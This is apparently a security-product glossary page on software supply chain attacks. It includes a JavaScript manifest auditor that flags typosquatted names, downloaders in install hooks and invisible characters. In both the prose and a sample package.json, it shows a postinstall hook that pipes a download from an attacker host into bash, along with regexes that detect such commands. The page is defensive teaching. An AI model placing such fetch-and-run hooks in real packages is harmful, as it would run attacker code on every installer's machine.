Supply Chain Attack

All ecosystems
Definition

A supply chain attack targets the tools, libraries, and services your code depends on rather than your code itself. Instead of breaking into your application directly, attackers compromise a dependency you trust — then everyone who installs that dependency gets the malicious code automatically.

Why it's hard to defend against

When you write npm install express, you're trusting Express and every package Express depends on. A modern Node.js application might have 500-1000 transitive dependencies — packages you've never heard of, maintained by people you've never met. An attacker only needs to compromise one of them.

The attack is particularly effective because the malicious code arrives through your normal build process. It looks identical to a legitimate dependency update. By the time anyone notices, the code has been running in production for days or weeks.

Common attack patterns

Compromised maintainer account

An attacker gains access to a package maintainer's npm or PyPI account and publishes a malicious version. The package's download count and reputation stay intact — only the code changes. The event-stream incident (2018) and dozens of others since have used this pattern.

Typosquatting

An attacker registers a package whose name is one typo away from a popular package, for example expres instead of express, then waits for developers to mistype the name and install the malicious version.

Dependency confusion

If your company uses private packages with certain names, an attacker can register those same names on the public registry. Some package managers will fetch the public version instead of the private one.

Build script injection

An attacker adds a command such as curl https://attacker.com/payload.sh | bash to a package's postinstall script. The script runs automatically when anyone installs the package.
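The typosquatting and build script injection patterns above leave traces in a package.json that can be checked mechanically. The JavaScript below is an added example, not part of the original page and not PackageFix's implementation. It flags dependency names one edit from a popular name, and install hooks that contain curl or wget or invisible Unicode characters. POPULAR, SAMPLE and the function names are assumptions made for illustration.

```javascript
// Added example, not PackageFix's code. POPULAR and SAMPLE are constructed for illustration.
const POPULAR = ["express", "lodash", "react", "axios"];
const INSTALL_HOOKS = ["preinstall", "install", "postinstall"];
const DOWNLOADER = /\b(curl|wget)\b/;
const PIPE_TO_SHELL = /\b(curl|wget)\b[^|]*\|\s*(sudo\s+)?(ba|z|da)?sh\b/;
// Format characters (zero-width, bidi controls) plus variation selectors.
const INVISIBLE = /[\p{Cf}\u{FE00}-\u{FE0F}\u{E0100}-\u{E01EF}]/u;

// True when a and b differ by exactly one insertion, deletion or substitution.
function oneEditApart(a, b) {
  if (a === b || Math.abs(a.length - b.length) > 1) return false;
  const [shorter, longer] = a.length <= b.length ? [a, b] : [b, a];
  let i = 0;
  while (i < shorter.length && shorter[i] === longer[i]) i++;
  // Same length: skip the substituted character in both. Otherwise skip the extra one in `longer`.
  const rest = shorter.slice(shorter.length === longer.length ? i + 1 : i);
  return rest === longer.slice(i + 1);
}

// Takes a parsed package.json (yours or an installed package's) and returns findings.
function auditManifest(pkg) {
  const findings = [];
  const deps = { ...pkg.dependencies, ...pkg.devDependencies };
  for (const name of Object.keys(deps)) {
    if (POPULAR.includes(name)) continue;
    const near = POPULAR.find((p) => oneEditApart(name, p));
    if (near) findings.push({ check: "typosquat", subject: name, detail: `one edit from ${near}` });
  }
  for (const hook of INSTALL_HOOKS) {
    const cmd = (pkg.scripts || {})[hook];
    if (typeof cmd !== "string") continue;
    if (PIPE_TO_SHELL.test(cmd)) findings.push({ check: "pipe-to-shell", subject: hook, detail: cmd });
    else if (DOWNLOADER.test(cmd)) findings.push({ check: "downloader", subject: hook, detail: cmd });
    const hidden = cmd.match(INVISIBLE);
    if (hidden) {
      const cp = hidden[0].codePointAt(0).toString(16).toUpperCase();
      findings.push({ check: "invisible-char", subject: hook, detail: `U+${cp}` });
    }
  }
  return findings;
}

// Constructed manifest that combines the cases described above.
const SAMPLE = {
  dependencies: { expres: "^4.18.0", lodash: "^4.17.21" },
  scripts: { preinstall: "node setup.js\u200B", postinstall: "curl https://attacker.com/payload.sh | bash", test: "node test.js" },
};
console.log(auditManifest(SAMPLE));
```

A one-edit name match is only a prompt for manual review, since legitimate packages can sit one character from a popular name.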

Real examples that hit production


Common questions

How is a supply chain attack different from a regular vulnerability?
A regular vulnerability is a bug in code — it exists but hasn't been exploited yet. A supply chain attack is an active, intentional attack — someone deliberately puts malicious code into a package that developers trust and install.

Does npm audit catch supply chain attacks?
No. npm audit only checks for known CVEs in the vulnerability database. It doesn't detect malicious code added to a package, compromised maintainer accounts, or typosquatting. Those require behavioral analysis and supply chain-specific detection.

What does PackageFix check for supply chain attacks?
PackageFix checks for: Unicode/invisible characters in scripts (Glassworm), packages dormant for 12+ months that suddenly updated (zombie packages), package names one character from popular packages (typosquatting), curl/wget in postinstall scripts (build script injection), and packages flagged on the CISA KEV catalog.

Can I completely prevent supply chain attacks?
No — but you can significantly reduce your exposure. Keep dependencies updated, use lockfiles, pin specific versions in CI, and scan manifests regularly with tools like PackageFix.
